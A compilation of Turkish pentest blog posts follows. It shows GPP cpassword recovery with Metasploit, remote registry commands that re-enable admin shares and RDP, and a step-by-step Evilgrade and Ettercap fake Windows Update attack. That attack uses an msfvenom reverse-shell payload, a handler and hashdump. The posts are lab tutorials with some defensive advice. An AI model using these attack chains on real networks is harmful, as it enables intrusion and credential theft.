Grup İlkeleri (Preferences) ile Yerel Kullanıcı Parolalarının Ayarlanması ve Bu Özelliğin Kötüye Kullanılması

Grup İlkeleri (Preferences) ile Yerel Kullanıcı Parolalarının Ayarlanması ve Bu Özelliğin Kötüye Kullanılması

Grup ilkeleri Policy ve Preferences olmak üzere iki şekilde kullanılır. Eğer kullanıcı isteğine bırakılmadan bir ilkenin grup ilkeleri ile ayarlanması isteniyorsa Policy kullanılır. Eğer kullanıcı tarafından değişiklik yapılmasına izin verilecek ayarlar yapılacak ise Preferences tercih edilir.

Preferences ile yerel kullanıcı ve grupların bir takım özellikleri ayarlanabilir. Bu özelliklerden birisi de yerel kullanıcıların parolasıdır. Böylelikle, yerel kullanıcıların parolası merkezi bir şekilde yönetilebilir. Ancak bu ayarın yapılması durumunda bu parolalar (parolaların açık hali), etki alanındaki herhangi bir bilgisayardan elde edilebilir.

Bu yazıda Windows Server 2008 R2 olan bir bilgisayar DC olarak kullanılmaktadır. Bu bilgisayarın adı (hostname) "SRV1", oluşturulan etki alanının adı ise "sizma.local" olarak belirlenmiştir.Senaryo için, etki alanında W7 adlı bir bilgisayar ve "Akif Pinar" adlı standart bir etki alanı kullanıcısı kullanılacaktır.

W7 bilgisayar "Orijinal Makineler" adlı bir OU içerisindedir:

"Akif Pinar", "Bilgi Islem" adlı bir OU içerisindedir:

"Akif Pinar" standart bir etki alanı kullanıcısıdır:

Not: W7 bilgisayarında "Akif Pinar" adlı kullanıcı ile oturum açılmasaydı, aşağıda belirtilen modül çalıştırılıp, Preferences içerisindeki parola bilgileri elde edilebilirdi.

Senaryonun en son aşamasında "GPO_AdministratorPassword", "Policy2" ve "Policy3" adlı grup ilkeleri aşağıdaki gibi konumlandırılacaktır.

Ancak ilk durumda "Policy2" ve "Policy3" oluşturulmamış ve herhangi bir OU altına bağlanmamıştır (link edilmemiştir).

İlk durumda, W7 bilgisayarın bulunduğu OU altına sadece "GPO_AdministratorPassword" ilkesi uygulanmaktadır. Bu ilke ile yerel "Administrator" hesabının parolası ayarlanmıştır:

Not: W7 üzerinde oturum açan "Akif Pinar" hesabının bulunduğu OU'ya özel bir politika uygulanmamıştır.

"Akif Pinar" kullanıcısı ile W7 üzerinde oturum açıldığında 5 adet grup ilkesi görülmektedir (\\SRV1\sysvol\sizma.local\Policies dizini altında):

Not: 4. ekran görüntüsünde bulunan Group Policy Management arayüzünde, "Group Policy Objects" altında ilk durumda 5 adet grup ilkesi bulunmaktaydı.

SYSVOL dizini altındaki "Groups.xml" dosyası 2 grup ilkesinde bulunmaktadır. Bunlardan birisi "GPO_AdministratorPassword", diğeri ise "GPO_TubitakDisable" ilkesidir:

Not: Groups.xml haricinde aranabilecek diğer 2 dosya Printers.xml ve Drives.xml dosyalarıdır.

Bu XML dosyalarının içeriği aşağıdaki gibidir:

Yukarıdaki ekran görüntüsünde de görüldüğü gibi, "GPO_TubitakDisable" ilkesi ile "tubitak" adlı yerel kullanıcının hesabı devre dışı bırakılmıştır. Bunun yanında "GPO_AdministratorPassword" ilkesi ile yerel "Administrator" kullanıcısının parolası ayarlanmıştır. Ancak parola açık halde değil, şifreli (değişikliğe uğramış şekilde) olarak "cpassword" değerinin karşısında saklanmaktadır. Kullanılan AES şifresi Microsoft tarafından bağlantıdaki linkte internete sunulmuştur. İnternet üzerindeki betikler kullanılarak cpassword değerinden parolanın açık hali elde edilebilir. Bunun yanında MSF post exploit modülü ile bu işlemler kolay bir şekilde gerçekleştirilebilir.

Bu amaçla öncelikle W7 makinesine Meterpreter oturumu açılır:

Daha sonra da açılan Meterpreter oturumunda post/windows/gather/credentials/gpp modülü (Windows Gather Group Policy Preference Saved Passwords) çalıştırılmak üzere ayarlanır.

Gerekli ayarlamalardan sonra bu modül çalıştırılır:

Yukarıdaki ekran görüntüsünde de görüldüğü gibi, "GPO_AdministratorPassword" ve "GPO_TubitakDisable" grup ilkeleri içerisinde "Groups.xml" dosyaları tespit edilmiştir. Ancak, sadece "GPO_AdministratorPassword" içerisinde parola bilgisi (cpassword) tespit edilmiştir. Tespit edilen bu değer deşifre edilmiş ve yerel "Administrator" kullanıcısının parolası "Test#12345." olarak tespit edilmiştir.

Daha sonra "Policy2" adı verilen grup ilkesi herhengi bir OU için oluşturulmuş ve bu ilke W7 bilgisayarına alınmıştır (gpupdate /force). Bu grup ilkesi; W7 bilgisayarından, "Akif Pinar" oturumunda görülmektedir:

MSF modülünün yeniden çalıştırılmasıyla, W7 bilgisayara ve oturum açan "Akif Pinar" adlı kullanıcıya yeni oluşturulan grup ilkesi uygulanmamasına rağmen, yeni oluşturulan "Policy2" adlı grup ilkesindeki parola bilgisi ("Deneme123456.") elde edilmiştir.

Sonraki aşamada ise, "Policy3" adlı bir grup ilkesi oluşturulmuş hiç bir OU'ya uygulanmamıştır. Bu ilke de W7 bilgisayarına alınmıştır (gpupdate /force). Bu greup ilkesi; W7 bilgisayarından, "Akif Pinar" oturumunda görülmektedir:

MSF modülünün yeniden çalıştırılmasıyla, W7 bilgisayara ve oturum açan "Akif Pinar" adlı kullanıcıya yeni oluşturulan grup ilkesi uygulanmamasına rağmen, yeni oluşturulan "Policy3" adlı grup ilkesindeki parola bilgisi ("Misafir123") elde edilmiştir.

Sonuç:

• Preferences kullanılarak yerel kullanıcıların parolaları ayarlanmamalıdır.
• Gereksiz grup ilkeleri oluşturulmamalıdır.
• Grup ilkeleri üzerindeki erişim ayarları (ACL) uygun şekilde yapılandırılmalıdır.
• MS14-025 zafiyeti kapatılmalıdır. Bu amaçla, KB2962486 güvenlik yaması geçilmelidir.

Etki Alanı Saldırılarına Karşı Temel Korunma Yöntemleri

Etki Alanı Saldırılarına Karşı Temel Korunma Yöntemleri

Günümüzde kurumlara yönelik gerçekleştirilen siber saldırılar artış göstermektedir. Bu durum, gerçekleşebilecek muhtemel saldırılara karşı, kurumların sızma testlerine verdiği önemi arttırmıştır. Bu amaçla kurum personeli tarafından ve dış kaynaklı firmalar tarafından sızma testleri gerçekleştirilmektedir. Özel sektörde veya kamu sektöründe gerçekleştirilen bu testler sonucunda sızma testi raporları hazırlanmakta ve bu raporlara göre sistemler sıkılaştırılmaktadır.

Önceki yazıda kurum ağındaki etki alanına gerçekleştirilebilecek saldırıların temel metodolojisinden bahsedilmişti. Ayrıca başka bir yazıda da konu ile ilgili örnek bir senaryo üzerinden videolu bir anlatım gerçekleştirilmişti.

Bu yazıda ise etki alanı sızma testlerine ve etki alanı saldırılarına karşı alınması gereken temel operasyonlardan bahsedilecektir. Bu operasyonlar, sızma testleri sonucunda raporlarda belirtilmektedir. Gerçekleştirilebilecek en temel operasyonlar aşağıdaki gibidir:

1) Etki Alanı Saldırılarından Korunma Yolları: Fiziksel Yapılandırma
http://ertugrulbasaranoglu.blogspot.com.tr/2013/08/etki-alan-saldrlarndan-korunma-yollar.html 

2) Etki Alanı Saldırılarından Korunma Yolları: Ağ Yapılandırması
http://ertugrulbasaranoglu.blogspot.com.tr/2013/08/etki-alan-saldrlarndan-korunma-yollar_16.html 

3) Etki Alanı Saldırılarından Korunma Yolları: Yama Yapılandırması
http://ertugrulbasaranoglu.blogspot.com.tr/2013/08/etki-alan-saldrlarndan-korunma-yollar_18.html 

4) Etki Alanı Saldırılarından Korunma Yolları: İmaj Yapılandırması
http://ertugrulbasaranoglu.blogspot.com.tr/2014/03/etki-alan-saldrlarndan-korunma-yollar.html 

5) Etki Alanı Saldırılarından Korunma Yolları: Kritik Hesapların Kullanımı
http://ertugrulbasaranoglu.blogspot.com.tr/2014/03/etki-alan-saldrlarndan-korunma-yollar_8.html 

6) Etki Alanı Saldırılarından Korunma Yolları: Diğer Güvenlik Önlemleri
http://ertugrulbasaranoglu.blogspot.com.tr/2014/03/etki-alan-saldrlarndan-korunma-yollar_2487.html

Kaynak:
https://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/etki-alani-saldirilarina-karsi-temel-korunma-yontemleri-1.html
https://www.bilgiguvenligi.gov.tr/siniflandirilmamis/etki-alani-saldirilarina-karsi-temel-korunma-yontemleri-2.html

Post Exploitation: Yönetimsel Paylaşımların Açılması

Post Exploitation: Yönetimsel Paylaşımların Açılması

Etki alanı saldırılarında Domain Admin olduktan sonra diğer sistemlere (veritabanı, ağ cihazları, sanallaştırma sistemler vs) giriş sağlamak için bu sistemlerin yöneticilerinin bilgisayarları tespit edilir. Örneğin, bir bilgisayarda önemli bir kullanıcının (EaKullanicisi1, Oracle DB yoneticisi, Network Yoneticisi vs) oturum açtığı ve bu bilgisayarın ilgili kişinin istemci bilgisayar olduğu tespit edilir.

Not: Bilgisayarı tespit etmek için KACAK adlı betik hedefe yönelik sonuç alma konusunda oldukça yararlıdır. Bunların haricinde birbirinden daha farklı yöntemler de vardır. Ancak belli kullanıcının oturum açtığı istemci bilgisayarını tespit etme konusu kapsam dışındadır.

Aranılan bilgisayar tespit edildikten sonra bu bilgisayara bağlantı kurulmaya çalışdığında RDP ile bağlanılamamakta ve yönetimsel paylaşımına girilememektedir. Çünkü bu bilgisayar kullanıcısı tarafından sıkılaştırılmış olabilmektedir.

Çünkü bu bilgisayarın yönetimsel paylaşım ve uzak masaüstü bağlantı ayarları aşağıdaki gibidir:

net share
reg query HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v AutoShareWks
reg query HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v AutoShareServer
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

Mevcut port tarama sonucu şu şekildedir:

Not: Paylaşım portu (445) açıkken, masaüstü erişim portu (3389) kapalıdır. Ancak 445. port açık olmasına (servis çalışmasına) rağmen daha önceki resimde de görüldüğü gibi ynetimsel paylaşımlar (C$ ve Admin$) kapalıdır.

Ancak bu metod etki alanı sızma testlerinde  etki alanı yönetici haklarına sahip olunduktan sonra saldırgan rolündeki kişi tarafından atlatılabilir. Bu bilgisayara erişmek için yönetimsel paylaşımı veya RDP bağlantısı açılması gerekmektedir. Bu işlem Remote Registry Editor (regedit.exe) ile kolaylıkla gerçekleştirilebilir. Eğer birden fazla bilgisayar (veya kullanıcı) söz konusu ise bu işlem zorlaşabilmektedir. Bunun gibi bir durumda ise betikler veya DC üzerindeki Grup İlkeleri kullanılabilir.

1) Remote Registry Editor (regedit.exe) veya Betik ile
smb_enumusers_domain modülünde kullanılan veya hedef istemci bilgisayarda yetkili olan bir hesap ile aşağıdaki komutlar çalıştırılarak ilgili kayıt değerleri değiştirilebilir:

reg add \\192.168.8.143\HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v AutoShareWks /t REG_DWORD /d 1 /f
reg add \\192.168.8.143\HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v AutoShareServer /t REG_DWORD /d 1 /f
reg add "\\192.168.8.143\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Not: Bu işlemin geçerli olması için istemcideki "Remote Registry" adlı servisi çalışıyor olmalıdır.
Not: Eğer birden fazla bilgisayar için işlem yapmak gerekiyorsa bir betikle her IP değeri için bu işlem gerçekleştirilmelidir.

Bunun yanında görsel olarak da editor üzerinden bu işlem gerçekleştirilebilir. Herhangi bir Windows makinede Registry Editor üzerinde "File > Connect Network Registry" adımları ile istenilen bilgisayara bağlanılabilir.

Daha sonra da istenilen değişiklik gerçekleştirilir.

Not: Yönetimsel paylaşımların etkinliği için gerçekleştirilen değişikliklerin gerçekleşmesi için bilgisayar yeniden başlamalıdır. Yeniden başlama işlemi için yine uzaktan bir komut ile (shutdown /m \\PC1 /f /r /t 0) bilgisayar yeniden başlatılmaya zorlanmalıdır.

Not: Yeniden başlatmaya gerek kalmadan lanmanworkstation ve lanmanserver servisleri durdurulup tekrar başlatılırsa (net stop <ServisAdi> ve net start <ServisAdi>) da ilgili değişiklikler yansıyabilir. Ancak bu durum her zaman geçerli olmayabiliyor. Bu sebeple bilgisayarn yeniden başlatılması daha garanti bir yöntemdir.

Son durumda (kayıt değerleri değiştirildikten ve bilgisayar yeniden başladıktan sonra) istemci üzerinde aşağıdaki komutlar kullanıldığında uygulanan değişikliklerin yansıdığı görülmüştür:

net share
reg query HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v AutoShareWks
reg query HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v AutoShareServer
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

Böylece yetkili herhangi bir Windows makineden, yönetimsel paylaşımların açıldığı ve uzak masaüstü bağlantısının etkinleştiriği görülmektedir.

2) Grup İlkeleri ile
Kayıt Defteri (veya regedit) ile kayıt değerlerinin değiştirilmesi için Remote Registry adlı servisin başlatılmış olması gerekir. Eğer başlatılmamışsa Grup İlkeleri ile daha önceden gerçekleştirilen aynı işlemler gerçekleştirilebilir.

Bu amaçla ilgili bilgisayarın [(PC1) veya kullanıcının (eakullanicisi1)] bulunduğu OU (sirket.local/Bilgisayarlar/Ankara/Bilgi Islem/Sistem ve Guvenlik/PC1) altındaki grup ilke nesnesi (GPO) kullanılacaktır. Grup ilkesinin ilk hali şu şekildedir:

Grup ilkesi için kayıt değeri aşağıdaki şekilde güncellenir:

• Bu amaçla Registry Wizard kullanılabilir. Ayrıntılı bilgi için bakınız: http://technet.microsoft.com/en-us/library/cc771001.aspx
• Diğer bir yöntem de şu şekildedir: http://technet.microsoft.com/en-us/library/cc753092.aspx
• Ayrıca betiklerle de bu işlem gerçekleştirilebilir: http://technet.microsoft.com/en-us/library/cc779329(v=ws.10).aspx

Son durumdaki grup ilkesi aşağıdaki gibi olacaktır.

Grup ilke nesnesi güncellendikten sonra ilgili değişiklikler gerçekleşmiştir (Bilgisayarın kendi kendine politikayı alması beklenmemesi için "gpupdate /force" komutu kullanılmıştır)

UYARI: Grup ilkelerinin kullanılması durumunda, ilkenin uygulanacağı nesneler (kulalnıcı hesabı, bilgisayar hesabı vs) iyi belirlenmelidir. Aksi halde istenilmeyen durumlar oluşabilir. Örneğin, bir kişiye veya gruba uygulanmak istenen üstteki politika aynı zamanda o kullanıcıların oturum açtığı her bilgisayarda etkin olabilir. Bu durumda bu kullanıcıların oturum açtığı her bilgisayarda RDC ve yönetimsel paylaşımlar açılabilir.

İpucu: Windows Update Özelliğinin Kötüye Kullanılması

İpucu: Windows Update Özelliğinin Kötüye Kullanılması

Uygun şekilde yapılandırılmamaış ağlarda saldırgan, kurban olarak seçtiği bir bilgisayar ile bu bilgisayarın gitmek istediği hedef adresin arasına girebilir. Örneğin Windows işletim sistemini güncellemesini gerçekleştirmek isteyen kurban, Microsoft’un güncelleme sitesine gitmek yerine, saldırganın belirlediği DNS kaydına göre ilgili bir sunucuya yönlendirilebilir. Böylece Windows işletim güncellemesi yerine saldırganın gönderdiği zararlı yazılım yüklenerek kurban bilgisayar, saldırganın eline geçmiş olur.

Bu işlemler 7 adımda incelenecektir:

• Saldırgan ve kurban bilgisayarları birbirlerine olan erişimleri kontrol edilecek
• Evilgrade uygulaması kurulacak ve “winupdate” modülü seçilecek
• “winupdate” modülü ve ilgili diğer kaynaklar ayarlanacak
• Ettercap ile KurbanaDNS spoofing saldırısı gerçekleştirilecek
• Saldırgan, kurban bilgisayardan gelen bağlantı taleplerini dinleyecek olan bir ortamı hazırlayacak
• Kurban işletim sistemini güncellemek için talepte bulunacak ve saldırganın hazırlamış olduğu zararlı uygulamayı indirecek
• Kurbanın zararlı yazılımı çalıştırmasıyla saldırgan kurbanın bilgisayarına bağlanacak ve hak yükseltecek

Erişimlerin Kontrolü
Kurban makine (192.168.100.78), saldırgan makineye erişebilmektedir:

Saldırgan makine (192.168.100.75), kurban makineye erişebilmektedir:

Evilgrade Uygulamasının Kurulumu ve Seçilen Modülün Seçilmesi
Öncelikle www.github.com/infobyte/evilgrade adresinden uygulama sıkıştırılmış bir dosya olarak indirilir:

Bu dosya saldırgana ait Backtrack bilgisayarına kopyalanır ve sıkıştırılmış dosya açılır. Evilgrade betiği çalıştırılır:

Modüllerin yüklenmesi beklenir:

Not: Diğer EvilGrade kurulum metodları için bakınız: http://blog.techdynamics.org/2011/07/howto-install-evilgrade-on-backtrack5.html

Not: Modüllerin listelenmesi için aşağıdaki komut çalıştırılır.

show modules

“winupdate” modülü kullanılmaya başlanır. Kullanılan komutlar aşağıdaki gibidir:

configure winupdate
show options

Not: Betik büyük/küçük harf duyarlıdır.
Üstteki ekran görüntüsünde de görüldüğü gibi “microsoft.com” üst alan adındaki bir takım sitelere erişim sağlanmaya çalışıldığında “agent.exe” adlı uygulama gönderilecektir.

“winupdate” Modülünün ve İlgili Kaynakların Ayarlanması
winupdate modülünde iki önemli nokta vardır: VirtualHost ve Agent. Bu başlıkta, 2 değere göre kaynak ayarlaması gerçekleştirilecektir.

VirtualHost: Kurban bilgisayara gerçekleştirilecek DNS Spoofing saldırısı için Ettercap adı verilen bir uygulama kullanılacaktır. Ettercap uygulaması, DNS spoofing için “/usr/local/share/ettercap/etter.dns” adlı dosyadaki DNS kayıtlarını kullanmaktadır. Bu dosya açılarak içerisine Microsoft sistemlerinin güncellenmesi için kulanılan DNS kayıtları için saldırgan tarafından belirlenen IP adresleri yazılır. Bu adres saldırganın sahip olduğu başka bir saldırı makinesi olabileceği gibi, saldırgann kullandığı Backtrack makinesi de olabilir. Örnek olarak saldırganın makinesi verilmiştir:

Agent: Kurbana gönderilecek olan ajan uygulamanın oluşturulması için msfcli, msfpayload, msfvenom, veya diğer teknikler kullanılabilir. Örnek olarak msfvenom kullanılacaktır. Bu amaçla ayrı bir konsolda msfvenom dizini tespit edilir:

which msfvenom
ls -la /usr/local/bin/msfvenom

EvilGrade uygulamasının başlatıldığı konsola geri dönülerek ajan uygulama oluşturulur. Bunun için, msfvenom kullanılarak kurbanın bağlanması istenen IP adresi (192.168.100.75) ve porta (TCP/4444) bağlantıyı sağlayacak olan “WindowsGuncellemeSaldirisi.exe” adlı bir exe oluşturulup tmp dizinine kaydedilir. Daha sonra da bu exe, ajan olarak ayarlanır.

set agent '["/opt/metasploit-4.4.0/app/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.100.75 LPORT=4444 -f exe  1> <%OUT%>/tmp/WindowsGuncellemeSaldirisi.exe<%OUT%>"]'

Ettercap ile DNS Spoofing İşleminin Başlatılması
Öncelikle boş bir konsol kullanılarak Ettercap arayüzü açılır. Daha sonra da spoofing işlemini gerçekleştirecek olan saldırganın ilgili ağ adaptörü seçilir (Shift + U).

ettercap -G
Sniff > Unified Sniffing 

Not: Seçilen adaptörün dinleme modunda olduğu görülmektedir.

Gelinen pencerede eklentiler listelenir (CTRL + P) ve “dns_spoof” adlı eklenti iki kerek tıklanarak aktifleştirilir:

Plugins > Manage the plugins
dns_spoof

Erişim sağlanabilen sistemler taranır (CTRL + S).

Hosts > Scan for hosts

Not: Tarama sonucunda tespit edilen sistemler listelenebilir (H):

Hosts > Hosts list

Tespit edilen sistemlere Arp zehirlemesi yapılır.

Mitm > Arp poisoning
Optional parameters: Sniff remote connections.

Not: Arp zehirleme işlemin gerçekleştirileceği gruplar otomatik olarak oluşur.

Dinleme işlemi başlatılır (CTRL +W).

Start > Start Sniffing

Not: İstemcinin herhangi bir işleminde saldırgan araya girmiş bulunmaktadır.

Saldırganın Kurban Bilgisayarı Dinlemesi
Saldırgan, saldırıya geçmeden önce kurbanın bağlantıyı kurdupubnda bu bağlantıyı dinleyeceği bir ortam gereklidir. Bu ortamı netcat sağlayabileceği gibi, meterpreter kabuğu ile iletişim kurabilen handler modülü de sağlayabilir. Kurbanın kuracağı bağlantıyı dinlemek için handler modülü başlatılır ve bağlantının kurulacağı IP (192.168.100.75) ve Port (4444) bilgisi girilir.

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.75
set LPORT 4444
show options

Gerekli ayarlamalar uygun şekilde gerçekleştirildikten sonra, kurbanın bağlantıyı başlatması beklenir:

Kurbanın Windows Güncelleştirmesini Başlatması ve Zararlı Yazılımı Alması
Kurban bilgisayarda Windows işletim sistemi güncelleştirilmesi için “windows.update.microsoft.com” adresi kullanılabilir:

Not: İşletim sisteminin otomatik olarak güncellenmesi de beklenebilirdi.
Ettercap’İn DNS kayıtlarını değiştirmesi sayesinde, kurban bilgisayar, Microsoft’un sitesi yerine saldırganın makinesine gider. EvilGrade’in winupdate modülü sayesinde de, kurban bilgisayar, yasal güncelleme paketi yerine, msfvenom ile oluşturulan zararlı yazılımı indirir:

Kurban zararlı yazılımı masaüstüne kaydeder:

Not: Zararlı yazılımının talep edilmesi EvilGrade üzerinde de görülebilmektedir.

Kurbanın Zararlı Yazılımı Çalıştırması ve Saldırganın Kurban Bilgisayarına Bağlanması
Kurban masaüstündeki zararlı yazılımı çalıştırır.

Kurban bilgisayarda bu zararlı yazılım çalıştırıldığında, yazılımın oluşturulduğu PAYLOAD sayesinde, kurban, saldırganın bilgisayarına bağlantı kuracaktır. Böylece bağlantı kurulmasını bekleyen Handler modülüne bağlantı kurulmuştur:

Artık hak yükseltme işlemi gerçekleştirilebilir. Bu amaçla tüm prosesler listelenir:

ps

Sistem hakları ile çalışan uygun bir prosese sıçranır. İstenirse yerel makinedeki hesapların parola özetleri elde edilebilir veya başka işlemler gerçekleştirilebilir:

migrate 1124
getuid
hashdump

Kaynak site:
http://www.mshowto.org/mitm-saldiri-yontemi-ile-windows-server-2008-nasil-hack-edilir.html
http://r00tsec.blogspot.com/2011/07/hacking-with-evilgrade-on-backtrack5.html